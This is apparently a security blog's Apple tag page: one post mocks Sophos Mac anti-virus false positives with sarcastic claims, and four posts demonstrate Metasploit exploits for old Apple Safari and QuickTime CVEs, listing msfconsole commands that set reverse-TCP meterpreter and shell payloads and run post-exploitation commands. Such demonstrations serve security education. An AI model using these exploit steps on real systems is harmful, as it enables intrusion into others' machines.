Posts tagged Apple

10 of 10 malwares detected by Mac Sophos Anti-Virus are false positives. Does yours?

0
2 days ago
in

On April 24, Sophos Naked Security blog had publish a post regarding malware infections on Mac OS X. Sophos has claim that 20% of Mac computers where carrying one or more instances of Windows malwares. All these malwares where detected though they’re free Sophos Anti-Virus for Mac Home Edition.

Flashback malware was the big story of April for Mac consumers and all anti-virus company have jump on this opportunity to promote they’re products and to distill propaganda around Mac OS X security. I agree with them Mac OS X is a product like other product, and Mac OS X has also to be protected against threats, but the proposed solutions are worse than to do nothing.

 

During my tests of Sophos Anti-Virus for Mac Home Edition 10 of 10 malwares detected by the anti-virus were false positives harassing me with constant alert pop-up during regular operations, Spotlight indexing, Time Machine backup. Here under a sample of 10 infections detected by Sophos Anti-Virus for Mac.

Perl/FtpExp-A

False positives due to binary format of the “affected” files.

/Users/xxxx/Library/Saved Application State/com.twitter.twitter-mac.savedState/window_1.data
/Users/xxxx/Library/Preferences/Macromedia/Flash Player/macromedia.com/support/flashplayer/sys/#s.ytimg.com/settings.sol

Troj/BredoZp-JO

Sophos him self is a trojan, and some iTunes applications and Chrome are backdoored and nobody known about it.

/Library/Preferences/com.sophos.sav.plist
/Users/xxxx/Music/iTunes/iTunes Media/Mobile Applications/iSSH 5.3.1.ipa
/Users/xxxx/Library/Saved Application State/com.google.Chrome.savedState/windows.plist

Troj/BredoZp-JN

iTunes is a very well-known backdoored software and one more time Sophos him self contain a trojan.

/Users/xxxx/Library/Caches/com.apple.iTunes/goog-phish-shavar.db
/Library/Preferences/com.sophos.sav.plist

Troj/Iframe-HY

One more time Sophos is a trojan, and now my Spotlight indexed files are also containing backdoor.

/Library/Preferences/com.sophos.sav.plist,
/Volumes/xxxx/.Spotlight-V100/Store-V2/700BF07C-170F-482E-A2BB-45EF8501935C/0.indexPostings

Mal/IRCBot-O 

VLC is containing an IRC bot, gotcha remote control of all VLC users.

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Troj/PhpShell-Z

One more time VLC how is containing a PHP trojan …

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Mal/PHPShell-A 

Everybody know that Sophos Anti-Virus products are developed in PHP.

/Library/Preferences/com.sophos.sav.plist

Troj/PDFJs-B 

Help my logs are containing trojans and Sophos one more time.

/private/var/log/DiagnosticMessages/2012.05.05.asl
/Library/Preferences/com.sophos.sav.plist

Mal/Badsrc-C

My Spotlight indexing has a dead malware…

/.Spotlight-V100/Store-V2/DeadFiles/orphan.ef786332/0000/0000/0151/22087716.txt

Troj/PhoexRef-A

Hu my screenshot of Metasploit are containing trojans (why not, lol) and Google drive is backdoored.

/Users/xxxx/Desktop/screenshots/metasploit-vmware-modules-research.png
/Users/xxxx/Library/Application Support/Google/Drive/sync_config.db
/usr/share/zoneinfo/UTC
/Library/Preferences/com.sophos.sav.plist

In conclusion Sophos is more strong to do marketing and give fear to consumers than to create a good Mac anti-virus that really detect something.

CVE-2011-3230 Apple Safari file:// Arbitrary Code Execution Metasploit Demo

1
7 months ago
in ,

Timeline :

Vulnerability discovered and reported to vendor by Aaron Sigel
Coordinated release of the vulnerability the 2011-10-12
Metasploit PoC provided the 2011-10-16

PoC provided by :

Aaron Sigel
sinn3r

Reference(s) :

CVE-2011-3230
HT5000

Affected version(s) :

Safari 5.1 for Mac OS X v10.6.8
Safari 5.1 for Mac OS X Server v10.6.8
Safari 5.1 for OS X Lion v10.7.2
Safari 5.1 for OS X Lion Server v10.7.2

Tested on Mac OS X 10.7.1 with :

Safari 5.1 (7524.48.3) and Java SE Runtime Environment (build 1.6.0_26-b03-383-11A511)

Description :

This module exploits a vulnerability found in Apple Safari on OSX platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OSX might automount), and then execute it in /Volumes/[share]. If there’s some kind of bug that leaks the victim machine’s current username, then it’s also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead.

Commands :

use exploit/osx/browser/safari_file_policy
set SRVHOST 192.168.178.21
set URIPATH /readme.html
set TARGET 1
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo

0
8 months ago
in ,

Timeline :

Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-11
Coordinated public release of the vulnerability the 2011-08-08
Metasploit PoC provided the 2011-09-03

PoC provided by :

MC

Reference(s) :

CVE-2011-0257
ZDI-11-252

Affected version(s) :

All Apple QuickTime Player previous to version 7.7

Tested on Windows XP SP3 with :

Apple QuickTime Player 7.6 (472)

Description :

This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

CVE-2010-1818 : Metasploit _Marshaled_pUnk QuickTime Remote Code Execution

0
1 year ago
in ,

Timeline :

Vulnerability discovered by HBelite and disclosed to ZDI
Vulnerability disclosed by ZDI to the vendor the 2010-06-30
Exploit-DB PoC provided by Ruben Santamarta the 2010-08-30
Metasploit PoC provided the 2010-08-30
Coordinated vulnerability disclosure the 2010-08-31

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-1818
ZDI-10-168

Affected version(s) :

Apple QuickTime 7.6.7

Tested on Windows XP SP3 with :

QuickTime 7.6.7
Internet Explorer 8

Description :

This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.

Commands :

use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2007-2175 : Apple QTJava toQTPointer() Arbitrary Memory Access

0
1 year ago
in ,

Timeline :

Vulnerability discovered by Shane Macaulay & Dino Dai Zovi during CanSecWest 2007
Vulnerability reported to ZDI by Dino A. Dai Zovi & Shane Macaulay
Vulnerability reported to the vendor by ZDI the 2007-04-23
Coordinated vulnerability disclosure the 2007-05-01
Metasploit PoC provided the 2007-05-29

    PoC provided by :

hdm
kf
ddz

    Reference(s) :

CVE-2007-2175
ZDI-07-023

    Affected version(s) :

QuickTime 7 previous version 7.1.6 for Windows and OS X

    Tested on Windows XP SP3 with :

    QuickTime 7.1.5

    Description :

This module exploits an arbitrary memory access vulnerability in the Quicktime for Java API provided with Quicktime 7.

    Commands :

use exploit/multi/browser/qtjava_pointer
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

Get Adobe Flash player
Go to Top